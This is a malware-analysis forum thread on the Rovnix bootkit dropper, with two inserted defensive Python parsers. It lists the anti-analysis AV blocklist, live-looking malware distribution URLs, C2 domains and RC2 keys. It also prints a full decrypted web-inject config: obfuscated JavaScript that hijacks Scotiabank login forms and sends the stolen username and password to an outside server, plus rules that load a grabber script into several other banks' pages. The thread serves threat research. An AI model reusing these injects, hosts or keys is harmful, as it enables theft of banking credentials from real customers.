A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #24924  by EP_X0FF
 Tue Jan 13, 2015 9:14 am
Dump it and compare. They will be different for XP and Vista simply because the boot loader has a different name, etc.
 #24994  by r3shl4k1sh
 Mon Jan 19, 2015 8:10 am
Tigzy wrote: I just want to know if from a machine A to a machine B there's nothing in the assembly code that is strongly related to the machine.
From what I know, the contents of the VBR are different for the different file systems it is installed on.
In a regular Windows setup it will create a small (usually 100MB) partition to host the boot files on it. This partition could be any format that Windows supports (FAT, NTFS etc.), so the VBR contents that are responsible for interacting with this partition and loading the appropriate files from it must be different.

Honestly, I have never checked whether the code of the VBR is different between FAT-32 and NTFS partitions, but do your checks.

As a side note, you should be aware of the fact that there are machines with recovery partitions (like some of the DELL and Acer laptops) where you have to be sure that their VBR is standard.

EDIT:
I quote from the Windows Internals book (Part 2, page 502) (boot sector == VBR):
Before writing to a partition’s boot sector, Windows Setup ensures that the boot partition (the boot
partition is the partition on which Windows is installed, which is typically not the same as the system
partition, where the boot files are located) is formatted with NTFS, the only supported file system that
Windows can boot from when installed on a fixed disk, or formats the boot partition (and any other
partition) with NTFS. Note that the format of the system partition can be any format that Windows
supports (such as FAT32). If partitions are already formatted appropriately, you can instruct Setup
to skip this step. After Setup formats the system partition, Setup copies the Boot Manager program
(Bootmgr) that Windows uses to the system partition (the system volume).

Setup must know the partition format before it writes a boot sector because the contents of the boot
sector vary depending on the format. For a partition that is in NTFS format, Windows writes NTFS capable
code. The role of the boot-sector code is to give Windows information about the structure
and format of a volume and to read in the Bootmgr file from the root directory of the volume. Thus,
the boot-sector code contains just enough read-only file system code to accomplish this task.
 #25873  by r3shl4k1sh
 Fri May 15, 2015 12:35 pm
Hi folks,

A fresh Rovnix dropper (MS: TrojanDropper:Win32/Rovnix.P, ESET: Win32/Rovnix.Z) that contains CVE-2013-3660 and CVE-2014-4113 in order to escalate its privileges.
d1049482df1d0d0cfe84f00eb710ab14009afb7a1d496ee664b7e24f312805ae

The driver contains an effective method to prevent loading of analysis tools by reading the RT_VERSION section of every loaded image (PsSetLoadImageNotifyRoutine) and comparing the strings it found to the following list:
Code:
agnitum alwilsoftware pctools grisoft aviragmbh aviraproduct avirafreeantivirus bitdefender avginternetsecurity comodo doctorweb eset,spol esetsmart frisksoftware kaspersky pandasoftware symanteccorporation checkpointsoftware microsoftsecurity microsoftmalware mcafee bullguard novashieldinc cjscreturnilsoftware sophosplc quickhealtechnologies gdatasoftware beijingrising immunetcorporation k7computing sunbeltsoftware beijingjiangmin usbdisksecurity deepfreeze virus malware rootkit rapport

If it finds a match, it terminates the process.
The driver hooks IRP_MJ_INTERNAL_DEVICE_CONTROL:

If the dropper is able to install the bootkit successfully, the payload DLL will be loaded by the driver (found in the FJ section); otherwise the payload DLL will be dropped onto the system and registered in the registry as:
Code:
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
rundll32.exe <payload.dll>, DllInitialize
If certain types of protection tools are installed on the system, the dropper downloads a fresh payload (instead of dropping the embedded payload), which has a much lower detection rate:



It stores the various files it drops to the system in aPlib-compressed form, using a slightly different header:

I wrote a post about the analysis of this dropper and the installation process:
http://www.malwaredigger.com/2015/05/ro ... lysis.html

Attached:
  • Packed and unpacked sample (VT 39/56)
  • Extracted drivers (32b VT 18/57, 64b VT 7/56)
  • Extracted FJ sections (payload 32b, VT 14/57)
  • Extracted payload (32b VT 23/56, 64b VT 10/55)
  • Downloaded payload (packed VT 2/57, unpacked VT 14/56)
  • Infected VBR (VT 14/57)
Attachments
pass: infected
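Added example (editor's code, not from the thread or from any poster's tooling): the driver described above decides whether to kill a process from the strings in the image's version resource. The script below parses a VS_VERSIONINFO blob the way a triage tool would (walking the StringFileInfo / StringTable / String blocks), then checks the strings against the list posted in #25873, so an analyst can tell in advance which of their tools would be terminated. The normalisation (lower-case, whitespace removed, substring match) is an assumption inferred from how the posted list looks ("ALWIL Software" -> "alwilsoftware"); the sample VS_VERSIONINFO is constructed in memory, not taken from any real binary.

```python
import struct

# Blocklist exactly as posted in #25873; the driver compares image version strings
# against it and terminates the process on a match.
ROVNIX_BLOCKLIST = (
    "agnitum alwilsoftware pctools grisoft aviragmbh aviraproduct avirafreeantivirus "
    "bitdefender avginternetsecurity comodo doctorweb eset,spol esetsmart frisksoftware "
    "kaspersky pandasoftware symanteccorporation checkpointsoftware microsoftsecurity "
    "microsoftmalware mcafee bullguard novashieldinc cjscreturnilsoftware sophosplc "
    "quickhealtechnologies gdatasoftware beijingrising immunetcorporation k7computing "
    "sunbeltsoftware beijingjiangmin usbdisksecurity deepfreeze virus malware rootkit rapport"
).split()


def _align4(n):
    return (n + 3) & ~3


def _read_block(buf, off):
    """Parse the header of one VS_VERSIONINFO-style block (wLength, wValueLength, wType, szKey).
    Returns (key, w_type, value_bytes, first_child_offset, block_end)."""
    w_len, w_val_len, w_type = struct.unpack_from("<HHH", buf, off)
    p = off + 6
    k_end = p
    while k_end + 2 <= len(buf) and buf[k_end:k_end + 2] != b"\x00\x00":  # szKey: NUL-terminated UTF-16LE
        k_end += 2
    key = buf[p:k_end].decode("utf-16-le")
    p = _align4(k_end + 2)                                     # value starts on a 32-bit boundary
    val_bytes = w_val_len * 2 if w_type == 1 else w_val_len    # wType 1 = text, length counted in WCHARs
    value = buf[p:p + val_bytes]
    return key, w_type, value, _align4(p + val_bytes), off + w_len


def version_strings(blob):
    """Collect every String entry under StringFileInfo: {'CompanyName': ..., 'ProductName': ...}."""
    found = {}

    def walk(off, end, in_string_info):
        while off + 6 <= end:
            key, w_type, value, child_off, blk_end = _read_block(blob, off)
            if blk_end <= off or blk_end > end:        # malformed length: stop rather than loop forever
                break
            if in_string_info and w_type == 1 and value:
                found[key] = value.decode("utf-16-le").rstrip("\x00")
            elif child_off < blk_end:                  # root / StringFileInfo / StringTable: recurse
                walk(child_off, blk_end, in_string_info or key == "StringFileInfo")
            off = _align4(blk_end)

    walk(0, len(blob), False)
    return found


def normalize(s):
    """Lower-case and drop whitespace ('ALWIL Software' -> 'alwilsoftware').
    This is an assumption about the driver's normalisation, inferred from the posted list."""
    return "".join(s.lower().split())


def blocked_by_rovnix(strings, blocklist=ROVNIX_BLOCKLIST):
    """Return the blocklist entries found in any version string (empty list = image would load)."""
    hits = set()
    for text in strings.values():
        norm = normalize(text)
        hits.update(word for word in blocklist if word in norm)
    return sorted(hits)


# --- constructed sample data: a minimal VS_VERSIONINFO built in memory, not from any real file ---

def _block(key, value=b"", w_type=1, children=()):
    val_len = len(value) // 2 if w_type == 1 else len(value)
    body = struct.pack("<HHH", 0, val_len, w_type) + key.encode("utf-16-le") + b"\x00\x00"
    body += b"\x00" * (_align4(len(body)) - len(body)) + value
    for child in children:
        body += b"\x00" * (_align4(len(body)) - len(body)) + child
    return struct.pack("<H", len(body)) + body[2:]


def build_sample_versioninfo(company, product):
    fixed = struct.pack("<13I", 0xFEEF04BD, 0x00010000, *([0] * 11))   # VS_FIXEDFILEINFO, 52 bytes
    def s(k, v):
        return _block(k, v.encode("utf-16-le") + b"\x00\x00")
    table = _block("040904b0", children=[s("CompanyName", company), s("ProductName", product)])
    return _block("VS_VERSION_INFO", fixed, w_type=0,
                  children=[_block("StringFileInfo", children=[table])])


if __name__ == "__main__":
    for company, product in [("ALWIL Software", "avast! Antivirus"), ("Example Corp", "Debugger")]:
        info = version_strings(build_sample_versioninfo(company, product))
        print(info, "->", blocked_by_rovnix(info) or "would load")
```

Note that the generic entries at the end of the list ("virus", "malware", "rootkit") match any product whose name merely contains the word, which is why the avast sample above trips two entries; a tool whose version resource carries a neutral company and product name is not affected by this check.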
 #25875  by R136a1
 Fri May 15, 2015 1:52 pm
To spread the dropper, compromised third-party websites are used.

List:
Code:
http://adronhomesproperties.com/CAUzjMl
http://adronhomesproperties.com/CAUzjMl/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://adronhomesproperties.com/sAo4YeZ
http://adronhomesproperties.com/sAo4YeZ/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://belenza.cl/CJMjR6g
http://belenza.cl/CJMjR6g/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://elalamochile.cl/DhXjt5I04
http://elalamochile.cl/DhXjt5I04/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://elalamochile.cl/xnFZgiV
http://elalamochile.cl/xnFZgiV/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://fiskalnekielce.pl/S7dte8
http://fiskalnekielce.pl/S7dte8/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://magem.cl/iwCZE
http://magem.cl/iwCZE/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://magem.cl/MgQmj
http://magem.cl/MgQmj/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://mariagraziacampus.it/ZMEsu9TCyc
http://mariagraziacampus.it/ZMEsu9TCyc/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://ortopediaespecializada.cl/dOojm
http://ortopediaespecializada.cl/dOojm/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://ortopediaespecializada.cl/YwOQq
http://ortopediaespecializada.cl/YwOQq/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://pondprasong.ac.th/57GfUmIrep
http://pondprasong.ac.th/57GfUmIrep/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://pondprasong.ac.th/o1mCQOxBL
http://pondprasong.ac.th/o1mCQOxBL/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://radiowtf.com.au/kR0gMUYv
http://radiowtf.com.au/kR0gMUYv/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://radiowtf.com.au/LJrxtZiOf
http://radiowtf.com.au/LJrxtZiOf/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://somedia.so/7Jo3tVYQ
http://somedia.so/7Jo3tVYQ/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://somedia.so/tO2BHKw
http://somedia.so/tO2BHKw/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://tapmi-brandscan.com/2kwiFyaQpY
http://tapmi-brandscan.com/2kwiFyaQpY/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://tribalevangelisttimothy.org/8CZnFRA
http://tribalevangelisttimothy.org/8CZnFRA/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://vas-consult.com/pdByR
http://vas-consult.com/pdByR/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://vas-consult.com/x6XZhu2jsT
http://vas-consult.com/x6XZhu2jsT/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://vietkim.net/tmp/F8yMs
http://vietkim.net/tmp/F8yMs/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://vietkim.net/tmp/fgi8dmV
http://vietkim.net/tmp/fgi8dmV/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://wfsupplies.co.nz/images/VM6RBqaOpJ
http://wfsupplies.co.nz/images/VM6RBqaOpJ/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://www.acilnet.com/Xg2FbVQ8n4
http://www.acilnet.com/Xg2FbVQ8n4/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://www.eibe-online.de/p8uqzkEweY
http://www.eibe-online.de/p8uqzkEweY/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://www.samxiongphoto.com/pKSAXQD
http://www.samxiongphoto.com/pKSAXQD/Your_VirginMedia_bill_April2015_2983488_UR84.zip
Does anyone know the initial infection vector? Files are named to look like email attachments.
 #26045  by comak
 Tue Jun 09, 2015 10:25 pm
This shit uses a lot of code...

from unpacked rovnix dropper (8272f1d0de9011d1d02f49d7e68b1de1)

I extracted a bunch of binaries
Code:
bum.exe.1a8b8db96eac11f649c465f2b69ecc6a.bin: data
bum.exe.2be56b2ed5ba37c6df22cf2aa13fd352.bin: PE32 executable (native) Intel 80386, for MS Windows
bum.exe.2d253d6143d8a2e1e2e45cb850bc3ab0.bin: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
bum.exe.38ae84ee21a07e9bfa2172788133d177.bin: DOS executable (COM)
bum.exe.4f7d6948fb35e46c069762e8713dac86.bin: PE32+ executable (GUI) x86-64, for MS Windows
bum.exe.58ae86ff564075f34c3e9291b6c352c0.bin: data
bum.exe.61ad7164d9be76f24278bd9a858e7cb0.bin: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
bum.exe.98e70439a6922e06e24636779456b2b8.bin: PE32+ executable (native) x86-64, for MS Windows
bum.exe.a0b73982f48399e2b9fc99d54a2dc493.bin: PE32 executable (console) Intel 80386, for MS Windows
bum.exe.ac95ea72a833d54be29791008f3ced14.bin: PE32+ executable (native) x86-64, for MS Windows
bum.exe.ad8b2123a0e8a7b38c3245baf939cc43.bin: PE32 executable (native) Intel 80386, for MS Windows
bum.exe.c9f371cae74ed398cbe81bbf71ec0747.bin: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
where:
/tmp/bum.exe.61ad7164d9be76f24278bd9a858e7cb0.bin <- WoW64Ext library from https://github.com/rwfpl/rewolf-wow64ext

Sysinternals Myfault
bum.exe.2be56b2ed5ba37c6df22cf2aa13fd352.bin
bum.exe.ac95ea72a833d54be29791008f3ced14.bin

Sysinternals Contig
bum.exe.a0b73982f48399e2b9fc99d54a2dc493.bin

Shellcode?
bum.exe.1a8b8db96eac11f649c465f2b69ecc6a.bin
bum.exe.58ae86ff564075f34c3e9291b6c352c0.bin

Additional dll / payload
bum.exe.c9f371cae74ed398cbe81bbf71ec0747.bin
bum.exe.2d253d6143d8a2e1e2e45cb850bc3ab0.bin

Bootkit dropper?
bum.exe.ad8b2123a0e8a7b38c3245baf939cc43.bin
bum.exe.98e70439a6922e06e24636779456b2b8.bin

Unknown
bum.exe.4f7d6948fb35e46c069762e8713dac86.bin

From the payload it connects to the cnc for more modules - all compressed with aPlib
Code:
mediavvads3.uk
mediavvads4.uk
mediavvads5.uk
hbs63zj7mwj5g6w7.onion

paths:  
 /login.asp
 /images/{transparent.gif,pixel.gif}
 /download/${mod}.zip 
   - where mod is one of: AAFEA2B5, B06139B1, EB4E2654, 27747DC2 -- list obtained from cnc

rc2:
key: BN21Rc0LqZA9   iv: v03dSH36m
key: B4yQz67GbO1P  iv: v2Ds34BQ9



Code:
rovnix.AAFEA2B5.dll ->
  bootkitdll.c78ebe1395615d39350e5155fc8486e8.bin ->
     bootkitdll.1bf7b8392cdc996954bc1e28c9bead19.bin -- plvnc (exe?)
     
rovnix.B06139B1.dl ->
  bootkitdll.4acc23e1a445cca0a1e30f3171f90dac.bin ->
     bootkitdll.6206d4ef511899fe52d152713c27d392.bin -> 
       bootkitdll.4e113e510d913ae98561d2f31b60e108.bin -- (p6 - spyeye - softwaregrabber.dll)
       
rovnix.EB4E2654.dll ->
  bootkitdll.2e2d3ef681f085672655c805412907c7.bin ->
     bootkitdll.2023c04dec511027da26a4620e9bcae9.bin ->  (PLTOR)
       bootkitdll.fecf803f7d84d4cfa81277298574d6e6.bin  -- unzip
       bootkitdll.95622e8f469d586061b32b5312899624.bin  -- (zip - tor bundle)

rovnix.27747DC2.dll ->
  bootkitdll.cfc57b26908febaaab8398ffeec59579.bin ->  -- cnc comm -- ReactorDemo.dll
     bootkitdll.1f895c237b131c1739985e2851dc5236.bin -- injects -- ReactorDll.dll

shit load of code (15MB) -> http://lokalhost.pl/dump/reactor.zip
Attachments
pw: infected
 #26189  by r3shl4k1sh
 Fri Jun 26, 2015 8:44 am
Hi,

It seems like Symantec detects the latest Rovnix dropper and payload as Carberp.C:
http://www.symantec.com/connect/blogs/n ... down-under

Part of the decrypted web-injects from the sample posted by @comak (you can get the full web-injects in the attached zip file):
Code:
set_url *.scotiaonline.scotiabank.com/online/authentication/authentication.bns GP

data_before
<body>
data_end

data_inject
<script type="text/javascript">
jQuery('body').hide();


var _0x7f7f=["\x53\x43\x52\x49\x50\x54","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x3F\x72\x61\x6E\x64\x3D","\x72\x61\x6E\x64\x6F\x6D","\x26","\x61\x6A\x61\x78\x5F\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x73\x63\x72\x69\x70\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x6C\x6F\x61\x64\x65\x64","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x61\x70\x70\x6C\x79","\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50","\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66","\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76","\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F","\x3D","","\x72\x65\x70\x6C\x61\x63\x65","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function sendScriptRequest(_0xade3x2,_0xade3x3,_0xade3x4,_0xade3x5){var _0xade3x6=document[_0x7f7f[1]](_0x7f7f[0]);if(_0xade3x3){_0xade3x3=_0x7f7f[2]+Math[_0x7f7f[3]]()+_0x7f7f[4]+_0xade3x3;} else {_0xade3x3=_0x7f7f[2]+Math[_0x7f7f[3]]();} ;_0xade3x6[_0x7f7f[5]]=false;_0xade3x6[_0x7f7f[6]]=scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5);_0xade3x6[_0x7f7f[7]]=scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5);_0xade3x6[_0x7f7f[8]]=_0xade3x2+_0xade3x3;document[_0x7f7f[12]](_0x7f7f[11])[0][_0x7f7f[10]][_0x7f7f[9]](_0xade3x6);} ;function scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5){return function (){if(_0xade3x6[_0x7f7f[5]]){return ;} 
;if(!_0xade3x6[_0x7f7f[13]]||_0xade3x6[_0x7f7f[13]]==_0x7f7f[14]||_0xade3x6[_0x7f7f[13]]==_0x7f7f[15]){_0xade3x6[_0x7f7f[5]]=true;_0xade3x4[_0x7f7f[16]](_0xade3x6,_0xade3x5);_0xade3x6[_0x7f7f[10]][_0x7f7f[17]](_0xade3x6);} ;} ;} ;function decode64(_0xade3x9){var _0xade3xa=_0x7f7f[18]+_0x7f7f[19]+_0x7f7f[20]+_0x7f7f[21]+_0x7f7f[22];var _0xade3xb=_0x7f7f[23];var _0xade3xc,_0xade3xd,_0xade3xe=_0x7f7f[23];var _0xade3xf,_0xade3x10,_0xade3x11,_0xade3x12=_0x7f7f[23];var _0xade3x13=0;var _0xade3x14=/[^A-Za-z0-9\+\/\=]/g;_0xade3x9=_0xade3x9[_0x7f7f[24]](/[^A-Za-z0-9\+\/\=]/g,_0x7f7f[23]);do{_0xade3xf=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x10=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x11=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x12=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3xc=(_0xade3xf<<2)|(_0xade3x10>>4);_0xade3xd=((_0xade3x10&15)<<4)|(_0xade3x11>>2);_0xade3xe=((_0xade3x11&3)<<6)|_0xade3x12;_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xc);if(_0xade3x11!=64){_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xd);} ;if(_0xade3x12!=64){_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xe);} ;_0xade3xc=_0xade3xd=_0xade3xe=_0x7f7f[23];_0xade3xf=_0xade3x10=_0xade3x11=_0xade3x12=_0x7f7f[23];} while(_0xade3x13<_0xade3x9[_0x7f7f[28]]);;return unescape(_0xade3xb);} ;
      var bot_id = "%BOTID%" + "_ca_scotia";
	  var sa = decode64("aHR0cHM6Ly9zZWN1c3lzdG1lcy5wdy9zL2cucGhw");
	function blockonEnter()
    {
      jQuery("*").keydown(function(event)
   	  {
        if(13==event.keyCode){
		    event.preventDefault();
		    return false;
		}
     });
     jQuery("*").keyup(function(event) {
         if(13==event.keyCode){
		 	event.preventDefault();
		    return false;
		 }
     });
     jQuery("*").keypress(function(event) {
         if(13==event.keyCode){
		     event.preventDefault();
		    return false;
		 }
     });     
   }
   
 		function iLogin()
		{
               var u_login =  jQuery("input.signon-username").val();
               var u_pass  =  jQuery("input[type=password]").val();
                 if ( ( u_login.length  < 3 )  ||  ( u_pass.length  < 3 ) )
                {
                       alert('Error Message :\nPlease enter both your User ID and Password.');
                        return false;
               }   
          function myCallback()
          {
          jQuery('input[type=submit]').click();     
           }
           var req=  "send=1&bn=ca_scot&u_bot_id="  +    bot_id +"&u_login=" +u_login +"&u_pass=" + u_pass + "&log=ca_scot_login";
          sendScriptRequest(sa,req,myCallback, ["test123"]);
		   return false;
		}
		
	    jQuery(document).ready( function () {
		  	 blockonEnter();
		jQuery('input[type=submit]').hide();
		jQuery('input[type=submit]').before('<input id="signon_form:enter_sol" name="signon_form:enter_sol" onclick="iLogin();" value="Sign In" class="primary-button" type="button">');
		jQuery('body').show();
		});
</script>
data_end

data_after
data_end


set_url http*://*key.com* GP

data_before
sWinHTML += document.getElementById('wrapper').innerHTML;
data_end
data_inject
data_end
data_after
winprint.document.write(sWinHTML);
data_end

set_url http*://*key.com* GP

data_before
<link href="/ib2/css/print.css" rel="stylesheet"><body>
data_end
data_inject
data_end
data_after
';
data_end

set_url http*://*key.com* GP

data_before
<HEAD
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*key.com* GP

data_before
<head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*key.com* GP

data_before
<Head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*key.com* GP

data_before
<*finj*>
data_end
data_inject
<script>document.write('<sc'+'ript src="https://oscarday.com/figrab/figrabber.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
data_end
data_after
data_end


set_url http*://*.juniper.com* GP

data_before
<HEAD
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*.juniper.com* GP

data_before
<head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*.juniper.com* GP

data_before
<Head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*.juniper.com* GP

data_before
<*finj*>
data_end
data_inject
<script>document.write('<sc'+'ript src="https://oscarday.com/figrab/figrabber.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
data_end
data_after
data_end


set_url http*://*barclaycardus.com* GP

data_before
<html*>*<head*>*yui-common-a.js"></script>
data_end
data_inject
<script>document.write('<sc'+'ript src="https://oscarday.com/figrab/figrabber.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
data_end
data_after
data_end


set_url http*://*us.hsbc.com* GP

data_before
<HEAD
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*us.hsbc.com* GP

data_before
<head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*us.hsbc.com* GP

data_before
<Head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*us.hsbc.com* GP

data_before
<*finj*>
data_end
data_inject
<script>document.write('<sc'+'ript src="https://oscarday.com/figrab/figrabber.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
data_end
data_after
data_end


set_url http*://*hsbccreditcard.com* GP

data_before
<HEAD
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*hsbccreditcard.com* GP

data_before
<head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*hsbccreditcard.com* GP

data_before
<Head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*hsbccreditcard.com* GP

data_before
<*finj*>
data_end
data_inject
<script>document.write('<sc'+'ript src="https://oscarday.com/figrab/figrabber.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
data_end
data_after
data_end


set_url http*://*accountcentralonline.com/cmuser/login* GP

data_before
<HEAD
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*accountcentralonline.com/cmuser/login* GP

data_before
<head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*accountcentralonline.com/cmuser/login* GP

data_before
<Head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*accountcentralonline.com/cmuser/login* GP

data_before
<*finj*>
data_end
data_inject
<script>document.write('<sc'+'ript src="https://oscarday.com/figrab/figrabber.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
data_end
data_after
data_end
I wrote an analysis post about the payload and the banking trojan plugin:
http://www.malwaredigger.com/2015/06/ro ... lysis.html

Attached here are the payload and the decrypted plugins.
Attachments
pass: injected
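Added example (editor's code, not from the thread or from the trojan): the decrypted web-inject config above uses the set_url / data_before / data_inject / data_after / data_end layout, and the first thing a defender wants from such a file is the list of targeted URL patterns and the external hosts the injected script tags load from. The parser below reads that layout, turns each set_url glob into an anchored regex so a given URL can be checked against the rules, and pulls the script hosts out of the data_inject blocks (including the split '<sc'+'ript' form seen above). The config text is constructed for this example with placeholder domains; the flags column (GP in the thread) is preserved but not interpreted.

```python
import re

SECTIONS = ("data_before", "data_inject", "data_after")


def parse_webinjects(text):
    """Parse set_url/data_*/data_end rules into a list of dicts (one per set_url line)."""
    rules, current, section, buf = [], None, None, []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("set_url "):
            parts = stripped.split()
            current = {"url": parts[1], "flags": parts[2] if len(parts) > 2 else "",
                       "data_before": "", "data_inject": "", "data_after": ""}
            rules.append(current)
        elif stripped in SECTIONS:
            section, buf = stripped, []
        elif stripped == "data_end" and current is not None and section is not None:
            current[section] = "\n".join(buf)     # empty sections stay ""
            section = None
        elif section is not None:
            buf.append(line)                      # keep the raw line, markers like " finj" included
    return rules


def pattern_to_regex(pattern):
    """set_url patterns are globs in which '*' matches any run of characters; anchor whole-URL."""
    return re.compile("^" + ".*".join(re.escape(piece) for piece in pattern.split("*")) + "$")


def matching_rules(rules, url):
    """All rules whose set_url pattern matches the given URL, in config order."""
    return [r for r in rules if pattern_to_regex(r["url"]).search(url)]


_SCRIPT_SRC = re.compile(r"""src\s*=\s*['"]([^'"?]+)""", re.I)
_HOST = re.compile(r"^https?://([^/]+)", re.I)


def remote_script_hosts(rules):
    """Hosts the data_inject blocks pull external scripts from (the second-stage inject servers)."""
    hosts = set()
    for r in rules:
        for src in _SCRIPT_SRC.findall(r["data_inject"]):
            m = _HOST.match(src)
            if m:
                hosts.add(m.group(1).lower())
    return sorted(hosts)


# Constructed sample config with placeholder domains (same layout as the decrypted injects above).
SAMPLE_CONFIG = r"""
set_url http*://*bank.example/login* GP

data_before
<head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*bank.example/login* GP

data_before
<*finj*>
data_end
data_inject
<script>document.write('<sc'+'ript src="https://injector.example/grab.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
data_end
data_after
data_end

set_url *.other.example/auth* GP

data_before
<body>
data_end
data_inject
<script>jQuery('body').hide();</script>
data_end
data_after
data_end
"""


if __name__ == "__main__":
    rules = parse_webinjects(SAMPLE_CONFIG)
    for r in rules:
        print(r["url"], r["flags"], "inject:", r["data_inject"].strip()[:60])
    print("hosts:", remote_script_hosts(rules))
    print([r["url"] for r in matching_rules(rules, "https://www.bank.example/login?x=1")])
```

The two-step "finj" trick in the sample is the one used in the real config: the first rule plants a marker inside the head tag, and the second rule matches on that marker to place the script tag, which lets one inject string work regardless of how the page spells the tag.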